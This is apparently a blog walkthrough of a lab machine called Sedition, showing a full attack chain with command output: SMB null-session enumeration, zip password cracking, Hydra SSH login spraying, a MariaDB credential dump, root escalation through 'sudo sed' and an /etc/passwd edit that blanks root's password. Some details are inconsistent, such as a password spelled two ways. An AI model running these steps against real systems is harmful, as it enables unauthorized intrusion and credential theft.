SEDITION MACHINE

SEDITION


The first step was network reconnaissance to identify the target machine, arp-scan was used to find active hosts on the local network, confirming the existence of the host at 192.168.88.3.
┌──(root㉿kali)-[/home/luis]
└─# arp-scan -I eth0 --localnet                           
Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.88.1    d8:44:89:50:2d:a3    (Unknown)
192.168.88.2    00:e0:4c:97:01:a7    (Unknown)
192.168.88.3    08:00:27:69:09:9a    (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.947 seconds (131.48 hosts/sec). 3 responded
 
Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed that ports 445 (SMB) and 139 (LDAP) and 65535 (UNKNOWN) were open.                                                           
┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p- --min-rate 5000 -sC 192.168.88.3 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-18 18:18 CEST
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:18
Completed NSE at 18:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:18
Completed NSE at 18:18, 0.00s elapsed
Initiating ARP Ping Scan at 18:18
Scanning 192.168.88.3 [1 port]
Completed ARP Ping Scan at 18:18, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 18:18
Scanning 192.168.88.3 [65535 ports]
Discovered open port 139/tcp on 192.168.88.3
Discovered open port 445/tcp on 192.168.88.3
Discovered open port 65535/tcp on 192.168.88.3
Completed SYN Stealth Scan at 18:18, 2.42s elapsed (65535 total ports)
NSE: Script scanning 192.168.88.3.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:18
Completed NSE at 18:19, 28.09s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:19
Completed NSE at 18:19, 0.00s elapsed
Nmap scan report for 192.168.88.3
Host is up, received arp-response (0.00019s latency).
Scanned at 2025-09-18 18:18:40 CEST for 31s
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE      REASON
139/tcp   open  netbios-ssn  syn-ack ttl 64
445/tcp   open  microsoft-ds syn-ack ttl 64
65535/tcp open  unknown      syn-ack ttl 64
MAC Address: 08:00:27:69:09:9A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Host script results:
| smb2-time:
|   date: 2025-09-18T16:18:48
|_  start_date: N/A
| nbstat: NetBIOS name: SEDITION, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   SEDITION<00>         Flags: <unique><active>
|   SEDITION<03>         Flags: <unique><active>
|   SEDITION<20>         Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: 4s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 34753/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 28763/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 43320/udp): CLEAN (Failed to receive data)
|   Check 4 (port 41220/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:19
Completed NSE at 18:19, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:19
Completed NSE at 18:19, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 31.12 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Now, we should write in the file hosts the domain which is SEDITION as you can see below.
┌──(root㉿kali)-[/home/luis]
└─#nano /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
192.168.88.3    SEDITION
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

As smb port(445) is alive we have to try listing smb with this command which you can see below, where we have discovered O.S and windows version.

┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.3 -u '' -p ''                                                         
SMB         192.168.88.3    445    SEDITION         [*] Unix - Samba (name:SEDITION) (domain:SEDITION) (signing:False) (SMBv1:False)
SMB         192.168.88.3    445    SEDITION         [+] SEDITION\: 

In addition, we should try use smbmap to see if it is possible obtain some information but as you can see below there is different files with this command where we have discovered a file which we can read.
  • smbmap -H 192.168.88.3 -u '' -p '' 
┌──(root㉿kali)-[/home/luis]
└─# smbmap -H 192.168.88.3 -u '' -p ''                                                           
    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[\] Checking for open ports...                                                                              [*] Detected 1 hosts serving SMB
[|] Authenticating...                                                                                       [*] Established 1 SMB connections(s) and 0 authenticated session(s)
[/] Authenticating...                                                                                       [-] Enumerating shares...                                                                                   [\] Enumerating shares...                                                                                   [|] Enumerating shares...                                                                                   [/] Enumerating shares...                                                                                   [-] Enumerating shares...                                                                                   [\] Enumerating shares...                                                                                   [|] Enumerating shares...                                                                                   [/] Enumerating shares...                                                                                   [-] Enumerating shares...                                                                                   [\] Enumerating shares...                                                                                   [|] Enumerating shares...                                                                                   [/] Enumerating shares...                                                                                   [-] Enumerating shares...                                                                                   [\] Enumerating shares...                                                                                   [|] Enumerating shares...                                                                                   [/] Enumerating shares...                                                                                   [-] Enumerating shares...                                                                                                                                                                                       

[+] IP: 192.168.88.3:445    Name: SEDITION                Status: NULL Session
    Disk                                                      Permissions    Comment
    ----                                                      -----------    -------
    print$                                                NO ACCESS    Printer Drivers
    backup                                                READ ONLY    
    IPC$                                                  NO ACCESS    IPC Service (Samba Server)
    nobody                                                NO ACCESS    Home Directories

[\] Closing connections..                                                                                   
[|] Closing connections..                                                                                   
[/] Closing connections..                                                                                   
[-] Closing connections..                                                                                   
[*] Closed 1 connections  
┌──(root㉿kali)-[/home/luis]
└─# smbclient -NL //192.168.88.3      

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    backup          Disk      
    IPC$            IPC       IPC Service (Samba Server)
    nobody          Disk      Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.88.3 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

We have to enter in the machine with the next command which is:
  •  smbclient -N //192.168.88.3/backup -U Anonymous
Now, we can see we have been able to enter into the machine and list the files as you can see below which is secretito.zip.
┌──(root㉿kali)-[/home/luis]
└─# smbclient -N //192.168.88.3/backup -U Anonymous
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul  6 19:02:53 2025
  ..                                  D        0  Sun Jul  6 20:15:13 2025
  secretito.zip                       N      216  Sun Jul  6 19:02:31 2025

In addition, we have to download and read in our attacker machine the file as you can see below.
smb: \> get secretito.zip
getting file \secretito.zip of size 216 as secretito.zip (35,2 KiloBytes/sec) (average 35,2 KiloBytes/sec)

┌──(root㉿kali)-[/home/luis]
└─# ls
CVE-2025-32463_chwoot  galeria.txt     password_bloodhound  reverse.php        text.php
Descargas              Imágenes        passwords.txt        reverse_shell.php  users1.txt
docker-compose.yml     jamm.txt        persistence.txt      secretito.zip      Vídeos
Documentos             LinkedInDumper  Plantillas           sedition.txt       vulnyx_shop.txt
Escritorio             Música          prueba.elf           SMS-Bomber         Win7Blue
friendly.txt           nc.exe          Público              spoofy

Now, we can list the same files with the netexec command as with the other command as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.3  -u 'null' -p 'null' --shares
SMB         192.168.88.3    445    SEDITION         [*] Unix - Samba (name:SEDITION) (domain:SEDITION) (signing:False) (SMBv1:False)
SMB         192.168.88.3    445    SEDITION         [+] SEDITION\null:null (Guest)
SMB         192.168.88.3    445    SEDITION         [*] Enumerated shares
SMB         192.168.88.3    445    SEDITION         Share           Permissions     Remark
SMB         192.168.88.3    445    SEDITION         -----           -----------     ------
SMB         192.168.88.3    445    SEDITION         print$                          Printer Drivers
SMB         192.168.88.3    445    SEDITION         backup          READ            
SMB         192.168.88.3    445    SEDITION         IPC$                            IPC Service (Samba Server)
SMB         192.168.88.3    445    SEDITION         nobody                          Home Directories

Now, we have discovered tolkit zip2john  which we can find out passwd as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# zip2john secretito.zip > secretito.txt                        
ver 1.0 efh 5455 efh 7875 secretito.zip/password PKZIP Encr: 2b chk, TS_chk, cmplen=34, decmplen=22, crc=F2E5967A ts=969D cs=969d type=0

In addition, we can discovered the password phrase which is sebastian as you can see below. 
┌──(root㉿kali)-[/home/luis]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt secretito.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sebastian        (secretito.zip/password)     
1g 0:00:00:00 DONE (2025-09-18 18:44) 50.00g/s 409600p/s 409600c/s 409600C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now we must desencrypt with the password before and then we will have execute cat password and we will find out password which is elbunkermolamogollon123.
┌──(root㉿kali)-[/home/luis]
└─# unzip secretito.zip
Archive:  secretito.zip
[secretito.zip] password password:
 extracting: password  
┌──(root㉿kali)-[/home/luis]
└─# cat password  
elbunkermolagollon123

As we knowledge an unknown port (65535) we should know what is this port with nmap toolkit as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p 65535 --min-rate 5000 -sC 192.168.88.3 -vvv -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-18 18:50 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Initiating ARP Ping Scan at 18:50
Scanning 192.168.88.3 [1 port]
Completed ARP Ping Scan at 18:50, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 18:50
Scanning 192.168.88.3 [1 port]
Discovered open port 65535/tcp on 192.168.88.3
Completed SYN Stealth Scan at 18:50, 0.02s elapsed (1 total ports)
Initiating Service scan at 18:50
Scanning 1 service on 192.168.88.3
Completed Service scan at 18:50, 0.02s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.88.3.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.24s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Nmap scan report for 192.168.88.3
Host is up, received arp-response (0.00050s latency).
Scanned at 2025-09-18 18:50:12 CEST for 0s

PORT      STATE SERVICE REASON         VERSION
65535/tcp open  ssh     syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
|   256 32:ca:e5:d1:12:c2:1e:11:1e:58:43:32:a0:dc:03:ab (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG/Kzfk09iAKKpRuJrSfx4A4WiSlvP++mk2g5NcP7Bfva4A0l0SZxeDNKXB6iJN1++qyQWE2OUVzLrZ8Gdjkn+M=
|   256 79:3a:80:50:61:d9:96:34:e2:db:d6:1e:65:f0:a9:14 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILvZ909p40dk+Vi+xYHAfVXI4wI0XGPS/fgHXpFI2mRP
MAC Address: 08:00:27:69:09:9A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.76 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

After we have discovered the ssh open port which is 65535 we sholuld find out user with the hydra toolkit as you can see below. 
┌──(root㉿kali)-[/home/luis]
└─# hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p elbunkermolagollon123 ssh://192.168.88.3:65535             
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-18 18:54:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task
[DATA] attacking ssh://192.168.88.3:65535/
[65535][ssh] host: 192.168.88.3   login: cowboy   password: elbunkermolagollon123

Gotcha! credentials are:
  1. Username: cowboy
  2. Password: elbunkermolamogollon123
Now, we have to enter via ssh protocol with the next command which you can see below. 
┌──(root㉿kali)-[/home/luis]
└─# ssh cowboy@192.168.88.3 -p 65535
The authenticity of host '[192.168.88.3]:65535 ([192.168.88.3]:65535)' can't be established.
ED25519 key fingerprint is SHA256:d64eWXWzi0z5UIXU5lGoJN3ggXzK28/LPtdAVK3mHkw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.88.3]:65535' (ED25519) to the list of known hosts.
cowboy@192.168.88.3's password:

Now, we have to try escalate privileges and we let's go to execute the next command and discover an Internacional port which is  3306(Database MARIADB) as you can see below.
cowboy@Sedition:~$ ss -tulpn
Netid     State      Recv-Q     Send-Q          Local Address:Port          Peer Address:Port    Process    
udp       UNCONN     0          0                     0.0.0.0:68                 0.0.0.0:*                  
udp       UNCONN     0          0              192.168.88.255:137                0.0.0.0:*                  
udp       UNCONN     0          0                192.168.88.3:137                0.0.0.0:*                  
udp       UNCONN     0          0                     0.0.0.0:137                0.0.0.0:*                  
udp       UNCONN     0          0              192.168.88.255:138                0.0.0.0:*                  
udp       UNCONN     0          0                192.168.88.3:138                0.0.0.0:*                  
udp       UNCONN     0          0                     0.0.0.0:138                0.0.0.0:*                  
tcp       LISTEN     0          50                    0.0.0.0:445                0.0.0.0:*                  
tcp       LISTEN     0          50                    0.0.0.0:139                0.0.0.0:*                  
tcp       LISTEN     0          128                   0.0.0.0:65535              0.0.0.0:*                  
tcp       LISTEN     0          80                  127.0.0.1:3306               0.0.0.0:*                  
tcp       LISTEN     0          50                       [::]:445                   [::]:*                  
tcp       LISTEN     0          50                       [::]:139                   [::]:*                  
tcp       LISTEN     0          128                      [::]:65535                 [::]:*    
Permission denied, please try again.
cowboy@192.168.88.3's password:
Linux Sedition 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul  6 20:00:56 2025 from 192.168.0.17
cowboy@Sedition:~$ sudo -l
[sudo] contraseña para cowboy:
Sorry, user cowboy may not run sudo on sedition.

In addition, we can discover history commands as you can see below.
cowboy@Sedition:~$ history
    1  history
    2  exit
    3  mariadb
    4  mariadb -u cowboy -pelbunkermolagollon123
    5  su debian
    6  clear
    7  sudo -l
    8  clear
    9  sudo -l
   10  clear

Let's go to execute the nexo command to enter database as you can see below. 
cowboy@Sedition:~$ mariadb -u cowboy -pelbunkermolagollon123
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 37
Server version: 10.11.11-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

Now, we have to execute the nexo commands which are:
  1. show databases; (To see databases)
  2. user bunker; (To use database)
  3. show tables; (To see tables in database)
  4. select * from users; (To obtain users and password in it is possible) 
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| bunker             |
| information_schema |
+--------------------+
2 rows in set (0,001 sec)

MariaDB [(none)]> use bunker
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [bunker]> show tables;
+------------------+
| Tables_in_bunker |
+------------------+
| users            |
+------------------+
1 row in set (0,000 sec)
MariaDB [bunker]> select * from users;
+--------+----------------------------------+
| user   | password                         |
+--------+----------------------------------+
| debian | 7c6a180b36896a0a8c02787eeafb0e4c |
+--------+----------------------------------+
1 row in set (0,001 sec)

Now, we as we have discovered the password we can enter into the machine as you can see below (password: password1)
cowboy@Sedition:~$ su debian
Contraseña:
debian@Sedition:/home/cowboy$ ls
ls: no se puede abrir el directorio '.': Permiso denegado
debian@Sedition:/home/cowboy$ cd ..
debian@Sedition:/home$ ls
cowboy  debian
debian@Sedition:/home$ cd cowboy/
bash: cd: cowboy/: Permiso denegado

Now, we have to execute the next command and obtain information to escalate privs in machine.     
debian@Sedition:/home$ sudo -l
Matching Defaults entries for debian on sedition:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User debian may run the following commands on sedition:
    (ALL) NOPASSWD: /usr/bin/sed

Go to GTOBINS from this link: https://gtfobins.github.io/gtfobins/sed/

debian@Sedition:/home/cowboy$ sudo sed -n '1e exec bash 1>&0' /etc/hosts
Gotcha! We are root user
root@Sedition:/home/cowboy# whoami
root
root@Sedition:/home/cowboy#
root@Sedition:/home# cd debian/
root@Sedition:/home/debian# ls
backup    flag.txt

Gotcha! we have found out flag.txt as you can see below (user flag).
root@Sedition:/home/debian# cat flag.txt
pinguinitopinguinazo

Also, we can be able to root with this method which we change to root because we don't watt root have password as you can see below.    
debian@Sedition:/home/cowboy$ sed -i 's/root:x/root:/g' /etc/passwd
debian@Sedition:/home/cowboy$ su root
root@Sedition:/home/cowboy#

root@Sedition:/home/cowboy# cd /root
root@Sedition:~# ls
root.txt
Gotcha! we have found out root flag
root@Sedition:~# cat root.txt
laflagdelbunkerderootmolaaunmas

Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »